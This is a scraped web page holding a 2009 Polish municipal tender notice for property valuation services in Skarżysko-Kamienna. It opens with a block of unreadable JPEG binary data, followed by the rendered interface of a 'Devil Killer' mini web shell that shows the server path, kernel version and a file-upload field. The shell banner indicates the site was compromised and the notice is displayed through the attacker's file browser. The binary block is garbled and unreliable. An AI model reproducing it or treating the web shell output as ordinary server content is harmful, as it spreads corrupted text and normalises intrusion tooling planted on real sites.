JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090402/88932-N-2009.html

<p class="kh_header"><b>Skarżysko-Kamienna: Sporządzanie  operatów szacunkowych 
dla potrzeb Gminy Skarżysko - Kamienna</b><br>
<b>Numer ogłoszenia: 88932 - 2009; data zamieszczenia: 02.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Skarżysko-Kamienna , ul. Sikorskiego 18, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 2520100, faks 041 2520200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.skarzysko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzanie  operatów szacunkowych 
dla potrzeb Gminy Skarżysko - Kamienna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 4 zadania.
Zadanie Nr 1:  	Wycena nieruchomości oraz obmiar nieruchomości  
  			lokalowych

	Przedmiotem zamówienia jest:
1.	Wycena nieruchomości lokalowej mieszkalnej z obmiarem - maksymalna ilość 30 wycen;
2.	Wycena nieruchomości lokalowej mieszkalnej bez obmiaru - maksymalna ilość  180 wycen;
3.	Wycena nieruchomości lokalu użytkowego z obmiarem - maksymalna ilość 2 wyceny
4.	Wycena nieruchomości lokalu użytkowego bez obmiaru - maksymalna ilość 7 wyceny
5.	Obmiar lokalu mieszkalnego lub użytkowego z naniesieniem na rzut poziomy kondygnacji - maksymalna ilość 80 obmiarów;
6.	Obmiar lokalu mieszkalnego lub użytkowego z wykonaniem rzutów poziomych kondygnacji i zaznaczeniem lokali na rzutach poziomych kondygnacji - maksymalna ilość 15 obmiarów.

Przewidywane ilości jw. stanowią maksymalny zakres.. Zamawiający zastrzega sobie możliwość zmniejszenia ilości zlecanych poszczególnych rodzajów operatów z zachowaniem cen jednostkowych i z tego powodu Wykonawcy  nie przysługują żadne dodatkowe roszczenia w stosunku do Zamawiającego. 

	W ramach umowy Wykonawca winien wykonać pomiar wszystkich lokali (uwidocznionych w zleceniu) wraz z pomieszczeniami przynależnymi , ponadto wynik pomiaru winien być potwierdzony protokołem podpisanym przez Wykonawcę(przy pomiarze powinien być najemca lub osoba dorosła zamieszkująca z najemcą).

Zadanie Nr 2:	Wycena nieruchomości gruntowych.

	Przedmiotem zamówienia jest:
1.	 Wycena nieruchomości gruntowej będącej w użytkowaniu wieczystym w celu uaktualnienia opłaty rocznej z tytułu tego użytkowania - maksymalna ilość 15 wycen;
2.	Wycena nieruchomości gruntowej w celu przekształcenia prawa użytkowania wieczystego w prawo własności - maksymalna ilość 75 wycen; punkt ten obejmuje wycenę prawa własności nieruchomości oraz prawa użytkowania wieczystego na niej ustanowionego poprzez pomnożenie wartości nieruchomości przez współczynnik korygujący. Sposób ustalania tego współczynnika reguluje Rozporządzenie Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz.U. Nr 207, poz. 2109 z późn. zm. )
3.	Wycena nieruchomości - sprzedaż prawa użytkowania wieczystego - maksymalna ilość 2 wyceny.

Zadanie Nr 3	Wycena nieruchomości zabudowanych dla potrzeb oddania w trwały zarząd

Przedmiotem zamówienia jest:
1.	 Wycena nieruchomości zabudowanej dla potrzeb oddania  w trwały zarząd - Ośrodek Sportowy GRANAT - działka nr ew. 62/4 o pow. 4,6183 ha, działka nr Ew. 62/8 o pow. 1,3883 ha - 1 wycena;
2.	Wycena nieruchomości zabudowanej dla potrzeb oddania w trwały zarząd - Hala sportowa przy ul. Sienkiewicza nr 34 - działka nr ew. 68/3 + boisko treningowe - 1 wycena.

Zadanie Nr 4	Wycena nieruchomości zabudowanych w celu naliczenia lub uaktualnienia opłaty za trwały zarząd.

Przedmiotem zamówienia jest:
1.	 Wycena nieruchomości zabudowanej w celu uaktualnienia opłaty za trwały zarząd - Miejski Ośrodek Pomocy Społecznej ul. Staffa 21 - działki nr Ew. 17/2, 17/3, 19/1 o łącznej pow. 0,2404 ha - 1 wycena;
2.	Wycena nieruchomości zabudowanej w celu naliczenia opłaty za trwały zarząd - Miejski Ośrodek Pomocy Społecznej - ul. Sikorskiego 12 - działka nr Ew. 62/158 o pow. 1039 m2 - 1 wycena;
3.	Wycena nieruchomości zabudowanej w celu uaktualnienia opłaty za trwały zarząd - Miejskie Centrum Sportu i Rekreacji - Pływalnia ul. Spółdzielcza 19 - działki nr Ew. 38/4, 38/5, 143/1, 37/4, 65/5 o łącznej pow. 6910 m2 -                             1 wycena;
4.	Wycena nieruchomości zabudowanej w celu uaktualnienia opłaty za trwały zarząd - Miejskie Centrum Sportu i Rekreacji - Planty ul. Zielna - działka                                   nr ew. 121 o pow. 5382 m2- 1 wycena.

Dotyczy Zadań od Nr 1 -4.
Podstawa prawna do wykonania powyższych operatów: ustawa z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz.U. z 2004 r. Nr 261 poz. 2603 z późn. zm. ); rozporządzenie Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego ( Dz.U. z 2004 r. Nr 207 poz. 2109 ze zm. ).
Wykonawca zobowiązany jest wykonać po 2 egzemplarze operatu szacunkowego do każdego zleconego zadania. Wykonawca ponosi koszty uzyskania wszelkich dokumentów niezbędnych do przedstawienia w operacie szacunkowym. Wykonawca użyje do wykonania operatów szacunkowych materiałów własnych oraz pokryje koszty związane z wykorzystaniem i zakupem materiałów geodezyjnych wymaganych do wykonania operatów szacunkowych oraz badaniem ksiąg wieczystych.
Szczegółowy zakres rzeczowy i termin realizacji poszczególnych operatów odbywać się będzie na podstawie zleceń wydawanych przez Wydział Gospodarki Nieruchomościami. ( dot. Zadań 1 i 2)
Wykonawca zobowiązany jest w ramach wynagrodzenia ( ryczałt lub cena jednostkowa - w zależności od zadania  ) do umieszczenia stosownej klauzuli w operacie szacunkowym, potwierdzającej jego aktualność, w przypadku stwierdzenia przez rzeczoznawcę majątkowego, który sporządził operat szacunkowy, że po okresie 12 miesięcy od daty jego sporządzenia, wartości przedstawione w operacie szacunkowym nie uległy zmianie (art. 156 ust. 4 ustawy o gospodarce nieruchomościami ).
Wykonawca zobowiązany jest na wezwanie zamawiającego, do składania pisemnych wyjaśnień i uczestnictwa w spotkaniach ze stronami toczących się postępowań w sprawach objętych zamówieniem. 

Wykonawca zobowiązany jest udzielić rękojmi na prace objęte przedmiotem zamówienia na okres 24 miesięcy od daty odbioru wykonanych prac przez zamawiającego. 
Zamawiający niniejsze zamówienie realizuje jako część większego zamówienia dot. sporządzania operatów szacunkowych. Wartość zamówienia, ustalona zgodnie z art. 32 ust. 4 Pzp jego łączna wartość poszczególnych części, nie przekracza wyrażonej w złotych równowartości kwoty 206.000 euro.
Wykonanie wycen i operatów w liczbie nie powodującej osiągnięcia ceny za wykonanie całości przewidywanej ilości usług nie uprawnia Wykonawcy do żądania zamówienia dodatkowego lub innych, a także do wypłacenia w całości ceny za przedmiot zamówienia (kwota za przewidywaną ilość usług). 
Wspólny Słownik Zamówień (CPV): 70000000-1 Usługi w zakresie nieruchomości: 71319000-7 Usługi biegłych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zadanie Nr 1
	==========
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału  w postępowaniu określone w art. 22 ust. 1 tj.:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia ,                a zwłaszcza aby wykazali,że :
a.	dysponują lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  tj.:
-	co najmniej jedna osoba posiadająca uprawnienia zawodowe w zakresie szacowania nieruchomości
-	co najmniej jedna osoba posiadająca uprawnienia wynikające z art. 14 ust. 1 pkt 2 ustawy z dnia 07.07.                 1994 r. Prawo budowlane (Dz.U. z 2006 r. Nr 156, poz. 1118 z późn. zm. ) tj. uprawnienia budowlane                             w specjalności konstrukcyjno-budowlanej.
i złożą odpowiednie dokumenty potwierdzające ww. uprawnienia zawodowe oraz dokument potwierdzający przynależność do właściwej izby samorządu zawodowego..
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia  , 
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia                           ( na podstawie art. 24 ust. 1 i 2 Pzp ) -  oraz złożą dokumenty potwierdzające spełnianie tych warunków, z zastrzeżeniem art. 26 ust. 3 Pzp.

Zadanie Nr 2,3,4
	==============
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału  w postępowaniu określone w art. 22 ust. 1 tj.:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia ,                a zwłaszcza aby wykazali,że :
a.	dysponują lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  tj.:
-	co najmniej jedna osoba posiadająca uprawnienia zawodowe w zakresie szacowania nieruchomości
i złożą odpowiednie dokumenty potwierdzające ww. uprawnienia zawodowe .
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia  , 
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia                           ( na podstawie art. 24 ust. 1 i 2 Pzp ) -  oraz złożą dokumenty potwierdzające spełnianie tych warunków, z zastrzeżeniem art. 26 ust. 3 Pzp.

 	 Opis sposobu dokonywania oceny spełniania tych warunków dot. Zadań            od Nr 1-4 :


1.	Zamawiający uzna, że wykonawca spełnia warunki udziału                                w postępowaniu, jeżeli wykonawca złoży wraz z ofertą wszystkie dokumenty wskazane  w pkt. 6 wykazujące spełnienie wymagań tam wskazanych. Brak załączenia przez wykonawcę któregokolwiek                         z dokumentów zostanie uznane przez zamawiającego, jako  niespełnienie warunku, co będzie skutkować wykluczeniem wykonawcy                                     z postępowania, z zastrzeżeniem art. 26 ust. 3 Pzp.
2.	Zamawiający wezwie wykonawców, którzy  przed upływem terminu składania ofert nie złożą wymaganych przez zamawiającego oświadczeń lub dokumentów lub którzy nie złożą pełnomocnictw albo którzy złożą wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożą wadliwe pełnomocnictwa, do złożenia tych oświadczeń, dokumentów lub pełnomocnictw w wyznaczonym terminie.
3.	Zamawiający zaniecha wzywania wykonawcy do uzupełnień, o których mowa w ust. 2, jeżeli mimo ich złożenia oferta wykonawcy będzie podlegać odrzuceniu albo konieczne będzie unieważnienie postępowania.
4.	Oświadczenia i dokumenty składane na wezwanie zamawiającego muszą potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie  przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie póżniej niż w dniu, w którym upłynął termin składania ofert. ( art. 26 ust. 3 Pzp ).
5.	 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ( art. 23 ust. 1 ustawy Pzp ). Za podmioty występujące wspólnie uważa się również spółki cywilne oraz konsorcja. W tym przypadku Wykonawcy ustanawiają pełnomocnika ( art. 23 ust. 2 ustawy Pzp ).Wykonawcy występujący wspólnie każdy oddzielnie, nie mogą podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp, a także muszą spełniać wymogi, o których mowa w art. 22 ust. 1 Pzp.
6.	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą, zgodnie z art. 24 ust. 4 Pzp.
7.	Zamawiający oceni spełnienie warunków wg formuły spełnia lub                       nie spełnia na podstawie załączonych do oferty dokumentów , o których mowa   w pkt. 6...</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zadanie Nr 1:
	==========
1.	Zamawiający dokona oceny spełnienia w/w warunków na podstawie dokumentów, 	oświadczeń  i wykazów złożonych wraz z ofertą wykonania. Do oferty wykonania należy załączyć dokumenty wymienione w pkt. 6.2. 
2.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu wraz z ofertą wykonania   zał. Nr 2  lub oferta samodzielnie sporządzona przez Wykonawcę zgodnie z w/w załącznikiem Wykonawca  składa:

W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp, Zamawiający żąda załączenia do oferty:

a. 	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert,
Wymagana forma dokumentu - oryginał lub kserokopia poświadczona za zgodność z oryginałem przez  Wykonawcę .

W przypadku składania oferty przez Wykonawców występujących wspólnie ww. dokument musi być złożony przez każdego Wykonawcę.

b. 	oświadczenie, że Wykonawca spełnia wymagania określone w art 22 ust. 1 ustawy Prawo  zamówień publicznych z dnia 29 stycznia 2004 r. - wypełniony  druk oświadczenia zał. nr 3  lub oświadczenie Wykonawcy  sporządzone wg ww. wzoru 
Wymagana forma dokumentu - oryginał.
W przypadku składania oferty przez Wykonawców występujących wspólnie ww. oświadczenie musi być złożone przez każdego Wykonawcę.

	W celu potwierdzenia  warunku posiadania przez wykonawcę potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda:
c.		wypełniony zał. Nr 5/1 - druk wykazu osób potencjał kadrowy lub wykaz sporządzony zgodnie z tym załącznikiem, potwierdzający, że Wykonawca dysponuje  lub będzie dysponował osobami zdolnymi do wykonania zamówienia , które będą uczestniczyć  w wykonywaniu zamówienia  , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia ,a także zakresu wykonywanych przez nie czynności, tj.:
-	co najmniej jedna osoba posiadająca uprawnienia zawodowe w zakresie szacowania nieruchomości
-	co najmniej jedna osoba posiadająca uprawnienia wynikające z art. 14 ust. 1 pkt 2 ustawy z dnia 07.07.                 1994 r. Prawo budowlane (Dz.U. z 2006 r. Nr 156, poz. 1118 z późn. zm. ) tj. uprawnienia budowlane                             w specjalności konstrukcyjno-budowlanej.
i złożą odpowiednie dokumenty potwierdzające ww. uprawnienia zawodowe oraz dokument potwierdzający przynależność do właściwej izby samorządu zawodowego..
.          W przypadku , jeżeli wykonawca w wykazie wskazał osoby, którymi będzie dysponował winien załączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. 
Wymagana forma wykazu - oryginał. Pozostałe dokumenty wymienione w tym podpunkcie: oryginał lub kserokopia potwierdzona za zgodność z oryginałem  przez Wykonawcę.
W przypadku składania oferty przez Wykonawców występujących wspólnie ww. dokumenty mogą być składane łącznie.

3.	Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje 	pełnomocnik.
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.

4.	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia 	publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 	zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.
5.  	Dokumenty wymagane od wykonawców   mających siedzibę lub   miejsce   zamieszkania poza terytorium 	Rzeczypospolitej Polskiej:
a) 	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 6 ppkt 2a) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)  	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokument winien być wystawiony nie wcześniej 	niż 6 miesięcy przed upływem terminu składania ofert.
	Zadanie Nr 2 -4
	=============
1.	Zamawiający dokona oceny spełnienia w/w warunków na podstawie dokumentów, 	oświadczeń  i wykazów złożonych wraz z ofertą wykonania. Do oferty wykonania należy załączyć dokumenty wymienione w pkt. 6.2. 
2.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu wraz z ofertą wykonania   zał. Nr 2  lub oferta samodzielnie sporządzona przez Wykonawcę zgodnie z w/w załącznikiem Wykonawca  składa:

W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp, Zamawiający żąda załączenia do oferty:

a. 	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert,
Wymagana forma dokumentu - oryginał lub kserokopia poświadczona za zgodność z oryginałem przez  Wykonawcę .

W przypadku składania oferty przez Wykonawców występujących wspólnie ww. dokument musi być złożony przez każdego Wykonawcę.

b. 	oświadczenie, że Wykonawca spełnia wymagania określone w art 22 ust. 1 ustawy Prawo  zamówień publicznych z dnia 29 stycznia 2004 r. - wypełniony  druk oświadczenia zał. nr 3  lub oświadczenie Wykonawcy  sporządzone wg ww. wzoru 
Wymagana forma dokumentu - oryginał.
W przypadku składania oferty przez Wykonawców występujących wspólnie ww. oświadczenie musi być złożone przez każdego Wykonawcę.

	W celu potwierdzenia  warunku posiadania przez wykonawcę potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda:
c.		wypełniony zał. Nr 5/2 - druk wykazu osób potencjał kadrowy lub wykaz sporządzony zgodnie z tym załącznikiem, potwierdzający, że Wykonawca dysponuje  lub będzie dysponował osobami zdolnymi do wykonania zamówienia , które będą uczestniczyć  w wykonywaniu zamówienia  , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia ,a także zakresu wykonywanych przez nie czynności, tj.:
-	co najmniej jedna osoba posiadająca uprawnienia zawodowe w zakresie szacowania nieruchomości i złożą odpowiednie dokumenty potwierdzające ww. uprawnienia zawodowe .
.          W przypadku , jeżeli wykonawca w wykazie wskazał osoby, którymi będzie dysponował winien załączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. 
Wymagana forma wykazu - oryginał. Pozostałe dokumenty wymienione w tym podpunkcie: oryginał lub kserokopia potwierdzona za zgodność z oryginałem  przez Wykonawcę.

W przypadku składania oferty przez Wykonawców występujących wspólnie ww. dokumenty mogą być składane łącznie.

3.	Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje 	pełnomocnik.
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.

4.	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia 	publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 	zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.
5.  	Dokumenty wymagane od wykonawców   mających siedzibę lub   miejsce   zamieszkania poza terytorium 	Rzeczypospolitej Polskiej:
a) 	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 6 ppkt 2a) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)  	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca 	ma siedzibę lub miejsce zamieszkania. Dokument winien być wystawiony nie wcześniej 	niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umskarzysko.bip.doc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta
ul. Sikorskiego 18
26-110 Skarżysko-Kamienna
II piętro pok. 94.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 09:45, miejsce: Urząd Miasta 
ul. Sikorskiego 18
26-110 Skarżysko-Kamienna
